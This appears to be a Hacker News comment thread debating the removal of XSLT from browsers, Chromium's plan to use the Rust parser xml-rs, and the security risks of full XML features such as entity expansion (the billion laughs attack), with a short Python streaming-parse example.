item 45955183

nwellnhof | 3 months ago

Removing XSLT from browsers was long overdue and I'm saying that as ex-maintainer of libxslt who probably triggered (not caused) this removal. What's more interesting is that Chromium plans to switch to a Rust-based XML parser. Currently, they seem to favor xml-rs which only implements a subset of XML. So apparently, Google is willing to remove standards-compliant XML support as well. This is a lot more concerning.

xmcp123|3 months ago

It’s interesting to see the casual slide of Google towards almost Internet Explorer 5.1-style behavior, where standards can just be ignored “because market share”.

Having flashbacks of “<!--[if IE 6]> <script src="fix-ie6.js"></script> <![endif]-->”

granzymes|3 months ago

The standards body is deprecating XSLT with support from Mozilla and Safari (Mozilla first proposed the removal).

Not sure how you got from that to “Google is ignoring standards”.

Aurornis|3 months ago

I don’t get the comparison. The XSLT deprecation has support beyond Google.

waitwot|3 months ago

Interesting to watch technologists complain rather than engineer alternatives and ignore the political activism.

otabdeveloper4|3 months ago

So-called "standards" on the Google (c) Internet (c) network are but a formality.

jillesvangurp|3 months ago

> This is a lot more concerning.

I'm not so sure that's problematic. Browsers probably just aren't a great platform for doing a lot of XML processing at this point.

Preserving the half-implemented, frozen state of the early 2000s doesn't really serve anyone except those maintaining legacy applications from that era. I can see why they are pulling out complex C++ code related to all this.

It's the natural conclusion of XHTML being sidelined in favor of HTML 5 about 15-20 years ago. The whole web service bubble, bloated namespace processing, and all the other complexity that came with that just has a lot of gnarly libraries associated with it. The world has kind of moved on since then.

From a security point of view it's probably a good idea to reduce the attack surface a bit by moving to a Rust based implementation. What use cases remain for XML parsing in a browser if XSLT support is removed? I guess some parsing from javascript. In which case you could argue that the usual solution in the JS world of using polyfills and e.g. wasm libraries might provide a valid/good enough alternative or migration path.

fithisux|3 months ago

They don't reduce complexity. They translate C++ (static complexity) to JS (dynamic complexity).

Also it is not complexity if XSLT lives in a third-party library with a well defined interface.

The problem is control. They gain control in two ways: they get more involved in the XML code base, and the bad actors run in the JS sandbox.

That is why we have standards though. To relinquish control through interoperability.

svieira|3 months ago

> Removing XSLT from browsers was long overdue

> Google is willing to remove standards-compliant XML support as well.

> They're the same picture.

To spell it out, "if it's inconvenient, it goes", is something that the _owner_ does. The culture of the web was "the owners are those who run the web sites, the servants are the software that provides an entry point to the web (read or publish or both)". This kind of "well, it's dashed inconvenient to maintain a WASM layer for a dependency that is not safe to vendor any more as a C dependency" is not the kind of servant-oriented mentality that made the web great, not just as a platform to build on, but as a platform to emulate.

akerl_|3 months ago

Can you cite where this "servant-oriented" mentality is from? I don't recall a part of the web where browser developers were viewed as not having agency about what code they ship in their software.

Aurornis|3 months ago

> The culture of the web was "the owners are those who run the web sites, the servants are the software that provides an entry point to the web (read or publish or both)".

This is an attempt to rewrite history.

Early browsers like NCSA Mosaic were never even released as Open Source Software.

Netscape Navigator made headlines by offering a free version for academic or non-profit use, but they wanted to charge as much as $99 (in 1995 dollars!) for the browser.

Microsoft got in trouble for bundling a web browser with their operating system.

The current world where we have true open source browser options like Chromium is probably closer to a true open web than what some people have retconned the early days of the web as being.

zetafunction|3 months ago

https://issues.chromium.org/issues/451401343 tracks work needed in the upstream xml-rs repository, so it seems like the team is working on addressing issues that would affect standards compliance.

Disclaimer: I work on Chrome and have occasionally dabbled in libxml2/libxslt in the past, but I'm not directly involved in any of the current work.

inejge|3 months ago

I hope they will also work on speeding it up a bit. I needed to go through 25-30 MB SAML metadata dumps, and an xml-rs pull parser took 3x more time than the equivalent in Python (using libxml2 internally, I think.) I rewrote it all with quick-xml and got a 7-8x speedup over Python, i.e., at least 20x over xml-rs.
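
For context, a streaming (pull-style) parse like the Python baseline described above looks roughly like this in the stdlib; the element name and sample document are simplified illustrations, not real SAML metadata:

```python
# Minimal streaming parse with xml.etree.iterparse: count elements
# without building the whole tree, which matters for multi-MB dumps.
import io
import xml.etree.ElementTree as ET

sample = io.BytesIO(
    b"<md><EntityDescriptor id='a'/><EntityDescriptor id='b'/></md>"
)

count = 0
for event, elem in ET.iterparse(sample, events=("end",)):
    if elem.tag == "EntityDescriptor":
        count += 1
        elem.clear()  # release the subtree to keep memory flat

print(count)  # -> 2
```

The `elem.clear()` call is the key trick for large inputs: without it, iterparse still accumulates the full tree in memory.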

Ygg2|3 months ago

Wait. They are going along with an XML parser that supports DOCTYPEs? I get that XSLT is ancient and full of exploits, but so is DOCTYPE. It's literally the poster boy for the billion laughs attack (among other vectors).
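
For readers unfamiliar with the attack: the classic billion-laughs document is tiny, but nested entity definitions make it expand combinatorially. A sketch of the payload and its arithmetic (the traditional `lol`/`lol9` naming; `fanout` and `depth` are just the standard values):

```python
# Build the classic "billion laughs" payload: ten nested entity
# definitions, each expanding to 10 copies of the previous one.
fanout, depth = 10, 9

entities = ['<!ENTITY lol "lol">']
for i in range(1, depth + 1):
    ref = "&lol%d;" % (i - 1) if i > 1 else "&lol;"
    entities.append('<!ENTITY lol%d "%s">' % (i, ref * fanout))

doc = (
    '<?xml version="1.0"?>\n<!DOCTYPE lolz [\n'
    + "\n".join(entities)
    + "\n]>\n<lolz>&lol%d;</lolz>" % depth
)

# 10^9 copies of the 3-byte string "lol" after full expansion.
expanded = len("lol") * fanout ** depth
print(len(doc), expanded)  # a sub-1 KB document expanding to ~3 GB
```

A parser that expands entities eagerly, with no expansion limit, turns under 1 KB of input into gigabytes of output, which is why DOCTYPE support is the risky part.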

zzo38computer|3 months ago

I think it might make more sense to use WebAssembly and make them as extensions which are included by default (many other things possibly should also be made as extensions rather than built-in functions). The same can be done for picture formats, etc. This would improve security while also improving the versatility (since you can replace parts of things), if the extension mechanism would have these capabilities.

(However, I also think that generally you should not require too many features, if it can be avoided, whether those features are JavaScripts, TLS, WebAssembly, CSS, and XSLT. However, they can be useful in many circumstances despite that.)

jjkaczor|3 months ago

Yeah, when I first heard about this a month or so ago, my thoughts were exactly this - a WebAssembly polyfill.

dietr1ch|3 months ago

> Currently, they seem to favor xml-rs which only implements a subset of XML.

Which seems to be a sane decision given the XML language allows for data blow-ups[^0]. I'm not sure what specific subset of XML `xml-rs` implements, but to me it seems insane to fully implement XML because of this.

[^0]: https://en.wikipedia.org/wiki/Billion_laughs_attack

_heimdall|3 months ago

Given that you have experience working on libxslt, why do you think they should have removed the spec entirely rather than improving the current implementation or moving towards modern XSLT 3?

fithisux|3 months ago

Why keep XSLT if the huge majority of devs use the HTML5+CSS+JavaScript combo? Why pump money into a standard that will not be used?

Are XML technologies better or safer? Probably. However practice sets the standards. Is it a good thing? It remains to be seen.

Personally I am not satisfied with the "Web" experience. I find it unsafe, privacy disrespecting, slow and non-standards compliant.

cptskippy|3 months ago

> Currently, they seem to favor xml-rs which only implements a subset of XML.

What in particular do you find objectionable about this implementation? It's only claiming to be an XML parser, it isn't claiming to validate against a DTD or Schema.

The XML standard is very complex and broad; I would be surprised if anyone has implemented it in its entirety beyond a company like Microsoft or Oracle. Even then I would question it.

At the end of the day, much of XML is hard if not impossible to use or maintain. A lot of it was defined without much thought given to practicality, and most developers will never have to deal with a lot of its eccentricities.

gnatolf|3 months ago

I was somewhat confused and irritated by the lack of a clear frontrunner crate for XML support in rust. I get that xml isn't sexy, but still.

James_K|3 months ago

What's long overdue is them updating to a modern version of XSLT.